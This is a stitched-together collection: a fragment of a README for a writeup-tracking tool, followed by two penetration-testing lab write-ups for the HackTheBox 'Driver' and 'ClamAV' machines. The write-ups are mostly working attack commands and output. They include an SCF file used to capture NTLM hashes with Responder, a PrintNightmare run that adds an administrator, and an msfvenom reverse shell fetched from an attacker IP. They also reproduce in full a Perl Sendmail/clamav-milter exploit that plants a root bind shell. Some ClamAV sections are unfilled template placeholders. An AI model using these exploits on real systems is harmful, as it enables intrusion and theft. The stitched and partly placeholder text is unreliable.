'/home/kali/toolbox/projects/writeups/htb.rope/writeup.yml' created for target 'htb.rope' [+] created '/home/kali/toolbox/projects/writeups/htb.rope/ratings.png' file for target 'htb.rope' [+] created '/home/kali/toolbox/projects/writeups/htb.rope/matrix.png' file for target 'htb.rope' ``` ## Usage ![Usage](svachal01.png) ## Usecases 1. Start a new writeup: ![Start](svachal02.png) 1. Finish a writeup: ![Finish](svachal03.png) 1. Summarize all writeups: ![Summarize](svachal04.png) 1. Override default writeup directory and GitHub repo URL: ```console $ svachal -w $HOME/<reponame> -g "https://github.com/<username>/<reponame> ``` ## Summarized Writeup Graphs ![Top writeup categories](top_categories.png) ![Top writeup ports](top_ports.png) ![Top writeup protocols](top_protocols.png) ![Top writeup services](top_services.png) ## Argument Autocomplete Source the `.bash-completion` file within a shell to trigger auto-complete for arguments. This will require the following alias: ```console alias svachal='python3 $HOME/toolbox/projects/svachal/svachal.py -w $HOME/toolbox/projects/writeups -g http://github.com/<USERNAME>/writeups' ``` > You will need a [Nerd Fonts patched font](https://github.com/ryanoasis/nerd-fonts/tree/master/patched-fonts) for OS icons and other symbols to be rendered correctly.
# Driver - HackTheBox - Writeup Windows, 20 Base Points, Easy ## Machine ![‏‏Driver.JPG](images/Driver.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```21```, ```135```,```445``` and ```5985```. ***User***: Found ```admin:admin``` credentials for port ```80```, Using [smb-share-scf-file-attack](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/), Getting the user NTLM hash using ```responder``` and we get the credentials of ```tony``` user. ***Root***: By running ```Get-Service -Name "spooler"``` we can see that print spooler service is running - Using [PrintNightmare](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675) to get privilege escalation by creating a new user on administrator group. ![pwn.JPG](images/pwn.JPG) ## Driver Solution ### User Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Driver] └──╼ $ nmap -sV -sC -oA nmap/Driver 10.129.214.223 Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-04 23:47 IDT Nmap scan report for 10.129.214.223 Host is up (0.16s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h00m51s, deviation: 0s, median: 7h00m50s |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-10-05T03:49:02 |_ start_date: 2021-10-05T01:48:09 5985/tcp open wsman ``` By observing port 80 we get the following web page: ![port80.JPG](images/port80.JPG) As we can see It's ```MFP Firmware Update Center```. We are able to login using ```admin:admin``` credentials: ![updatecenter.JPG](images/updatecenter.JPG) By clicking on [Firmware Updates](http://10.10.11.106/fw_up.php) we get the following page: ![driverupdates.JPG](images/driverupdates.JPG) As we can read: >Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon. It means that when we upload a file the testing team will test that file. The first thing I have been tried to upload is ```exe``` file, But the testers team probably did not click on ```exe``` file. If they are not clicked on ```exe``` file we can try to steal the tester credentials by the following article: [https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/). Let's create ```scf``` file which points to our SMB server (which was created by ```Responder```), The ```scf``` file contains: ```json [Shell] Command=2 IconFile=\\10.10.14.14\test.ico [Taskbar] Command=ToggleDesktop ``` Start responder: ```console ┌─[evyatar@parrot]─[/hackthebox/Driver] └──╼ $ sudo responder -I tun0 [sudo] password for user: __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.0.0.0 Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C .... ``` Upload the file and we get the following request on ```Responder```: ```console [+] Listening for events... [SMB] NTLMv2-SSP Client : 10.10.11.106 [SMB] NTLMv2-SSP Username : DRIVER\tony [SMB] NTLMv2-SSP Hash : tony::DRIVER:82149bc3d263bd9e:267C5C286CFFB3C464B089FA27D8F626:0101000000000000C0653150DE09D201D10409C5AD7C40B1000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000002000000A96758F0C12A1A7D36DDF6C99FF4FABAE06427D8926E2B818CC7522561CCB630A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003600000000000000000000000000 ``` By cracking the hash using ```john``` we get: ```console ┌─[evyatar@parrot]─[/hackthebox/Driver] └──╼ $ john --wordlist=~/Desktop/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status liltony (tony) 1g 0:00:00:00 DONE (2021-10-16 23:48) 5.000g/s 163840p/s 163840c/s 163840C/s zombies..dyesebel Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed ``` Now, Using those creds ```tony:liltony``` we can use [evil-winrm](https://github.com/Hackplayers/evil-winrm): ```console ┌─[evyatar@parrot]─[/hackthebox/Driver] └──╼ $ evil-winrm -i 10.10.11.106 -u tony -p 'liltony' Evil-WinRM shell v3.3 Info: Establishing connection to remote endpoint dir *Evil-WinRM* PS C:\Users\tony\Documents> cd ../Desktop *Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt 90eef4470e629b603da63e8c8cceec54 ``` And we get the user flag ```90eef4470e629b603da63e8c8cceec54```. ### Root According to the machine portal hints, Let's check if we can use [CVE-2021-1675](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675) which is critical remote code execution and local privilege escalation vulnerability dubbed ```PrintNightmare```. First, Let's check if the printer ```spooler``` service is running on the system or not using ```Get-Service -Name “spooler”```: ```console *Evil-WinRM* PS C:\Users\tony\Documents> Get-Service -Name “spooler” Status Name DisplayName ------ ---- ----------- Running spooler Print Spooler ``` The print spooler service is running, Let's try to exploit it. Let's download the follwing powershell script [https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1](https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1) to the machine: ```console *Evil-WinRM* PS C:\Users\tony\Documents> (New-Object Net.WebClient).DownloadFile("http://10.10.14.14:8000/printnightmare.ps1","C:\Users\tony\Documents\printnightmare.ps1"); ``` Now, When we are trying to use ```Import-Module``` command with the PowerShell script we get the following error: ```console *Evil-WinRM* PS C:\Users\tony\Documents> Import-Module .\printnightmare.ps1 File C:\Users\tony\Documents\printnightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170. At line:1 char:1 + Import-Module .\printnightmare.ps1 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand ``` We can solve it but running [meterpreter-new-windows-powershell-extension](https://www.darkoperator.com/blog/2016/4/2/meterpreter-new-windows-powershell-extension), When we have a new ```meterpreter``` shell we can run ```load powershell``` command: ```console meterpreter > load powershell Loading extension powershell...Success. ``` Now, Let's load the script: ```console meterpreter > powershell_import printnightmare.ps1 [+] File successfully imported. No result was returned. ``` Once the Powershell module is imported, We can execute the script with the following command: ```powershell Invoke-Nightmare -NewUser "evyatar9" -NewPassword "P@ssw0rd" ``` This command will create a new user with administrator privileges. Let's try it: ```powershell meterpreter > powershell_shell PS > Import-Module .\printnightmare.ps1 PS > Invoke-Nightmare -NewUser "evyatar9" -NewPassword "P@ssw0rd" [+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll [+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll" [+] added user evyatar9 as local administrator [+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll ``` As we can see the existence of a new user named ```evyatar9``` which we created. Now, let’s check the privileges of this user. ```powershell PS > net user evyatar9 User name evyatar9 Full Name evyatar9 Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/28/2021 10:25:19 PM Password expires Never Password changeable 10/28/2021 10:25:19 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *None The command completed successfully. ``` As we can see, the new user we created belongs to the local administrator's group. Let's try to login using this user: ```console ┌─[evyatar@parrot]─[/hackthebox/Driver] └──╼ $ evil-winrm -i 10.10.11.106 -u evyatar9 -p 'P@ssw0rd' Evil-WinRM shell v3.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\evyatar9\Documents> cd ../../Administrator/Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 10/28/2021 9:16 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt 8527a1e25a7af7e4ae6317aaaf4a4c27 *Evil-WinRM* PS C:\Users\Administrator\Desktop> ``` And we get the root flag ```8527a1e25a7af7e4ae6317aaaf4a4c27```.
# ClamAV ## Table of Contents * [Summary](#summary) * [Enumerate](#enumerate) * [Ports](#ports) * [Services](#services) * [SSH](#ssh) * [SMTP](#smtp) * [HTTP](#http) * [RPC](#rpc) * [OS](#os) * [Nmap OS Discovery Scan](#nmap-os-discovery-scan) * [Nmap OS Discovery Scan via SMB](#nmap-os-discovery-scan-via-smb) * [Nmap Scripts Scan](#nmap-scripts-scan) * [Nmap Aggressive Scan](#nmap-aggressive-scan) * [Exploit](#exploit) * [Password Guessing](#password-guessing) * [Default Credentials](#default-credentials) * [Hydra](#hydra) * [Patator](#patator) * [CVE-2021-1234](#cve-2021-1234) * [EDB-ID-56789](#edb-id-56789) * [cyberphor POC](#cyberphor-poc) * [Metasploit](#metasploit) * [Explore](#explore) * [Escalate](#escalate) * [Lessons Learned](#lessons-learned) * [Walkthrough](#walkthrough) ## Summary * Hostname: 0XBABE * Description: Retired exam machine to help you prepare. * IP Address: 192.168.108.42 * MAC Address: 00:00:00:00:00:00 (ref: nbtscan) * Domain: WORKGROUP * TCP Ports and Services * 22 * SSH * 25 * SMTP * 80 * HTTP * 139 * NetBIOS * 199 * smux * 445 * Samba * 6000 * SSH * OS * Distro: (ref:) * Kernel: Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686 GNU/Linux (ref: uname via PE) * Architecture: x86 (ref: uname via PE) * Users * root:password123 (ref:) * root (ref: nmap smtp-enum-users script) * admin (ref: nmap smtp-enum-users script) * administrator (ref: nmap smtp-enum-users script) * webadmin (ref: nmap smtp-enum-users script) * sysadmin (ref: nmap smtp-enum-users script) * netadmin (ref: nmap smtp-enum-users script) * guest (ref: nmap smtp-enum-users script) * user (ref: nmap smtp-enum-users script) * web (ref: nmap smtp-enum-users script) * test (ref: nmap smtp-enum-users script) * Vulnerabilities and Exploits * Sendmail 8.13 * Current configuration allows an attacker to send email to local users via the following commands: mail from, rcpt to. * An attacker can use this vulnerability to perform Remote Code Execution (wget, chmod, ./rshell.elf). # Enumerate ## Setup ```bash TARGET=192.168.108.42 NAME=clamav new-ctf $NAME cd $NAME ``` ## Ports ```bash sudo nmap $TARGET -sS -sU --min-rate 1000 -oN scans/$NAME-nmap-initial sudo nmap $TARGET -sS -sU -p- --min-rate 1000 -oN scans/$NAME-nmap-complete sudo nmap $TARGET -sV $(print-open-ports-from-nmap-scan scans/$NAME-nmap-complete) -oN scans/$NAME-nmap-versions # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 08:33 EDT Nmap scan report for 192.168.108.42 Host is up (0.075s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) 25/tcp open smtp Sendmail 8.13.4/8.13.4/Debian-3sarge3 80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 199/tcp open smux Linux SNMP multiplexer 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 42.41 seconds ``` ## Services ### SSH ```bash hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://$TARGET # output NSTR ``` ### SMTP Automated enumeration of supported SMTP commands. ```bash sudo nmap $TARGET -p25 --script smtp-commands -oN scans/$NAME-nmap-script-smtp-commands # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 09:44 EDT Nmap scan report for 192.168.108.42 Host is up (0.073s latency). PORT STATE SERVICE 25/tcp open smtp | smtp-commands: localhost.localdomain Hello [192.168.49.108], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, |_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds ``` Automated enumeration of existing SMTP users. ```bash sudo nmap $TARGET -p25 --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY,EXPN,RCPT} -oN scans/$NAME-nmap-script-smtp-enum-users # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 09:45 EDT Failed to resolve "smtp-enum-users.methods=EXPN". Failed to resolve "smtp-enum-users.methods=RCPT". Failed to resolve "smtp-enum-users.methods=RCPT". Nmap scan report for 192.168.108.42 Host is up (0.079s latency). PORT STATE SERVICE 25/tcp open smtp | smtp-enum-users: | root | admin | administrator | webadmin | sysadmin | netadmin | guest | user | web |_ test Failed to resolve "smtp-enum-users.methods=RCPT". Nmap done: 1 IP address (1 host up) scanned in 1.90 seconds ``` Automated enumeration of exploitable SMTP vulnerabilities. ```bash sudo nmap $TARGET -p25 --script smtp-vuln* -oN scans/mailman-nmap-script-smtp-vuln # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 09:48 EDT Nmap scan report for 192.168.108.42 Host is up (0.075s latency). PORT STATE SERVICE 25/tcp open smtp | smtp-vuln-cve2010-4344: |_ The SMTP server is not Exim: NOT VULNERABLE Nmap done: 1 IP address (1 host up) scanned in 0.81 seconds ``` ### HTTP The target is not vulnerable to Shellshock. ```bash sudo nmap $TARGET -p80 --script http-shellshock -oN scans/$NAME-nmap-scripts-http-shellshock-80 # output NSTR ``` ```bash dirb http://$TARGET:80 -w /usr/share/wordlists/dirb/big.txt -z10 -o scans/$NAME-dirb-big-80 # output ---- Scanning URL: http://192.168.108.42/ ---- + http://192.168.108.42/cgi-bin/ (CODE:403|SIZE:277) + http://192.168.108.42/doc (CODE:403|SIZE:272) + http://192.168.108.42/index (CODE:200|SIZE:289) + http://192.168.108.42/index.html (CODE:200|SIZE:289) ``` ```bash dirsearch -u $TARGET:$PORT -o $FULLPATH/$NAME-dirsearch-80 --format=simple # output [09:11:52] 200 - 289B - /index.html [09:11:52] 200 - 289B - /index ``` ```bash nikto -h $TARGET -p $PORT -T 2 -Format txt -o scans/$NAME-nikto-misconfig-80 # output NSTR ``` ### NetBIOS ```bash nbtscan $TARGET # output Doing NBT name scan for addresses from 192.168.108.42 IP address NetBIOS Name Server User MAC address ------------------------------------------------------------------------------ 192.168.108.42 0XBABE <server> 0XBABE 00:00:00:00:00:00 ``` ### SMB ```bash smbclient -L $TARGET # output Enter WORKGROUP\victor's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig) ADMIN$ IPC IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- 0XBABE 0xbabe server (Samba 3.0.14a-Debian) brave pig Workgroup Master --------- ------- WORKGROUP 0XBABE ``` ```bash smbmap -H $TARGET # output [+] Guest session IP: 192.168.108.42:445 Name: 192.168.108.42 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers IPC$ NO ACCESS IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig) ADMIN$ NO ACCESS IPC Service (0xbabe server (Samba 3.0.14a-Debian) brave pig) ``` ## OS ```bash sudo nmap $TARGET -sC -oN scans/$NAME-nmap-scripts # output Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 09:14 EDT Nmap scan report for 192.168.108.42 Host is up (0.084s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA) |_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA) 25/tcp open smtp | smtp-commands: localhost.localdomain Hello [192.168.49.108], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP, |_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info 80/tcp open http | http-methods: |_ Potentially risky methods: TRACE |_http-title: Ph33r 139/tcp open netbios-ssn 199/tcp open smux 445/tcp open microsoft-ds Host script results: |_clock-skew: mean: 5h59m58s, deviation: 2h49m42s, median: 3h59m58s |_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.14a-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2021-07-07T13:15:02-04:00 | smb-security-mode: | account_used: guest | authentication_level: share (dangerous) | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Nmap done: 1 IP address (1 host up) scanned in 44.71 seconds ``` # Exploit ## Password Guessing ### Default Credentials ```bash # CMS Web App 9000 # admin:admin ``` ### Hydra ```bash hydra -l root -P /usr/share/wordlists/rockyou.txt $TARGET http-post-form "/phpmyadmin/index.php?:pma_username=^USER^&pma_password=^PASS^:Cannot|without" # output NSTR ``` ### Patator ```bash patator http_fuzz url=http://$TARGET/$LOGIN method=POST body='username=FILE0&password=FILE1' 0=usernames.txt 1=/usr/share/wordlists/rockyout.txt -x ignore:fgrep=Unauthorized ``` ## CVE-2021-1234 ### EDB-ID-56789 ```bash searchsploit foo mkdir edb-id-56789 cd edb-id-56789 searchsploit -x 56789 ``` ### cyberphor POC ```bash git clone https://github.com/cyberphor/cve-2021-1234-poc.git cd cve-2021-56789-poc ``` ### Metasploit ```bash msfconsole search ??? use exploit/???/??? set LHOST tun0 set RHOST $TARGET run ``` ### Sendmail ```bash msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.108 LPORT=443 -f elf -o rshell.elf sudo python3 -m http.server 80 telnet 192.168.108.42 25 helo moto mail from:<> rcpt to:<root+"|wget http://192.168.49.108/rshell.elf"@localhost> data . quit sudo nc -nvlp 443 telnet 192.168.108.42 25 mail from:<> rcpt to:<root+"|chmod +x rshell.elf"@localhost> data . mail from:<> rcpt to:<root+"|./rshell.elf"@localhost> data . cat /root/proof.txt useradd victor -g root -s /bin/bash echo "victor:password" | chpasswd ssh victor@192.168.108.42 # output Unable to negotiate with 192.168.108.42 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 ssh victor@192.168.108.42 -oKexAlgorithms=+diffie-hellman-group1-sha1 id # output uid=1000(victor) gid=0(root) groups=0(root) ``` # Lessons Learned * Enumerate SMTP commands and users. If you can "mail from, rcpt to" a super-user, then you can perform RCE. * SMTP can be used for RCE. * Identify what you can do and under what context. # Things Observed TCP Port 80 had a page titled Ph33r containing binary code. When decoded, the message reads "if you dont pwn me u r a n00b". ```bash firefox http://192.168.108.42 01101001 01100110 01111001 01101111 01110101 01100100 01101111 01101110 01110100 01110000 01110111 01101110 01101101 01100101 01110101 01110010 01100001 01101110 00110000 0011 0000 01100010 ifyoudontpwnmeuran00b ``` # Walkthrough * Tools Used * nmap * telnet * msfvenom * ping * tcpdump * wireshark * python3 http.server module * wget * chmod * nc * Flag * 1d74f53021975ed2425abd317a808ea6 * Hints * Carefully enumerate the SMTP service. * Enumerate the SNMP service. Using snmp-check can help extract info about running processes. Antivirus software should be updated. * Once you identify the antivirus software name and version, search for it on EDB. There is an RCE exploit for it. ```bash Exploitation Guide for ClamAV Summary This machine is exploited via a remote command execution vulnerability in Sendmail with clamav-milter. Enumeration Nmap We start off by running an nmap scan against all TCP ports: kali@kali:~$ sudo nmap -p- 192.168.120.81 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-23 09:55 EDT Nmap scan report for 192.168.120.81 Host is up (0.032s latency). Not shown: 65528 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 139/tcp open netbios-ssn 199/tcp open smux 445/tcp open microsoft-ds 60000/tcp open unknown Next, let’s run an aggressive scan against the discovered open ports: kali@kali:~$ sudo nmap -A -sV -p 22,25,80,139,199,445,60000 192.168.120.81 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-23 10:18 EDT Nmap scan report for 192.168.120.81 Host is up (0.031s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) | ssh-hostkey: | 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA) |_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA) 25/tcp open smtp? |_smtp-commands: Couldn't establish connection on port 25 80/tcp open http Apache httpd 1.3.33 ((Debian GNU/Linux)) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/1.3.33 (Debian GNU/Linux) |_http-title: Ph33r 139/tcp open tcpwrapped 199/tcp open smux Linux SNMP multiplexer 445/tcp open tcpwrapped 60000/tcp open ssh OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0) | ssh-hostkey: | 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA) |_ 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: firewall|general purpose|proxy server|WAP|PBX Running (JUST GUESSING): Linux 2.6.X (94%), Cisco embedded (94%), Riverbed embedded (94%), Ruckus embedded (94%), ZoneAlarm embedded (93%) OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:cisco:sa520 cpe:/h:riverbed:steelhead_200 cpe:/h:ruckus:7363 cpe:/h:zonealarm:z100g cpe:/h:cisco:uc320w cpe:/h:cisco:rv042 Aggressive OS guesses: Cisco SA520 firewall (Linux 2.6) (94%), Linux 2.6.9 - 2.6.27 (94%), Riverbed Steelhead 200 proxy server (94%), Ruckus 7363 WAP (94%), Linux 2.6.9 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 2.6.9 (CentOS 4.4) (94%), ZoneAlarm Z100G WAP (93%), Linux 2.6.18 (92%), Linux 2.6.32 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_nbstat: NetBIOS name: 0XBABE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 29.05 ms 192.168.118.1 2 29.21 ms 192.168.120.81 SMTP Enumeration Using netcat, we will try interacting with the SMTP service on port 25: kali@kali:~$ nc -vv 192.168.120.81 25 192.168.120.81: inverse host lookup failed: Unknown host (UNKNOWN) [192.168.120.81] 25 (smtp) open HELO test 220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Mon, 23 Mar 2020 14:20:48 -0400; (No UCE/UBE) logging access from: [192.168.118.3](TEMP)-[192.168.118.3] 250 localhost.localdomain Hello [192.168.118.3], pleased to meet you quit 221 2.0.0 localhost.localdomain closing connection sent 15, rcvd 299 kali@kali:~$ With the help of this enumeration, we have identified the service as ESMTP Sendmail SNMP Enumeration Although we did not scan for the SNMP service on UDP port 161 (and UDP scans are not very reliable anyway), we will attempt to enumerate SNMP service to see if it is running on the target. We can use the snmp-check tool for this purpose: kali@kali:~$ snmp-check 192.168.120.94 snmp-check v1.9 - SNMP enumerator Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) [+] Try to connect to 192.168.120.94:161 using SNMPv1 and community 'public' [*] System information: Host IP address : 192.168.120.94 Hostname : 0xbabe.local Description : Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686 Contact : Root <root@localhost> (configure /etc/snmp/snmpd.local.conf) Location : Unknown (configure /etc/snmp/snmpd.local.conf) Uptime snmp : 00:33:28.71 Uptime system : 00:32:46.43 System date : 2020-4-28 16:22:09.0 ... 3761 runnable klogd /sbin/klogd 3765 runnable clamd /usr/local/sbin/clamd 3767 runnable clamav-milter /usr/local/sbin/clamav-milter --black-hole-mode -l -o -q /var/run/clamav/clamav-milter.ctl 3776 runnable inetd /usr/sbin/inetd ... We find that SNMP service is indeed running on the target, and the output generated by this enumeration is quite large. Sifting through the output, we find clamav-milter is running with Sendmail in black-hole-mode. Exploitation Remote Code Execution Looking up exploits for this combination leads us to a Remote Command Execution vulnerability. Following the exploit, we will create the following Perl file: kali@kali:~$ cat 4761.pl #!/usr/bin/perl use IO::Socket::INET; print "Sendmail w/ clamav-milter Remote Root Exploit\n"; print "Copyright (C) 2007 Eliteboy\n"; if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;} print "Attacking $ARGV[0]...\n"; $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '25', Proto => 'tcp'); print $sock "ehlo you\r\n"; print $sock "mail from: <>\r\n"; print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n"; print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n"; print $sock "data\r\n.\r\nquit\r\n"; while (<$sock>) { print; } This exploit should hopefully open a bind shell on the target on TCP port 31337. Let’s give the exploit executable permissions, and then run it: kali@kali:~$ chmod 777 4761.pl kali@kali:~$ kali@kali:~$ ./4761.pl 192.168.120.144 Sendmail w/ clamav-milter Remote Root Exploit Copyright (C) 2007 Eliteboy Attacking 192.168.120.144... 220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Mon, 3 Aug 2020 16:30:08 -0400; (No UCE/UBE) logging access from: [192.168.118.3](FAIL)-[192.168.118.3] 250-localhost.localdomain Hello [192.168.118.3], pleased to meet you 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-EXPN 250-VERB 250-8BITMIME 250-SIZE 250-DSN 250-ETRN 250-DELIVERBY 250 HELP 250 2.1.0 <>... Sender ok 250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok 250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok 354 Enter mail, end with "." on a line by itself 250 2.0.0 073KU8jk004063 Message accepted for delivery 221 2.0.0 localhost.localdomain closing connection kali@kali:~$ If everything worked correctly, we should now be able to connect to the target on port 31337: kali@kali:~$ nc -nv 192.168.120.144 31337 (UNKNOWN) [192.168.120.144] 31337 (?) open whoami root Escalation As the vulnerable service was running with root privileges, no further privilege escalation is needed. ```
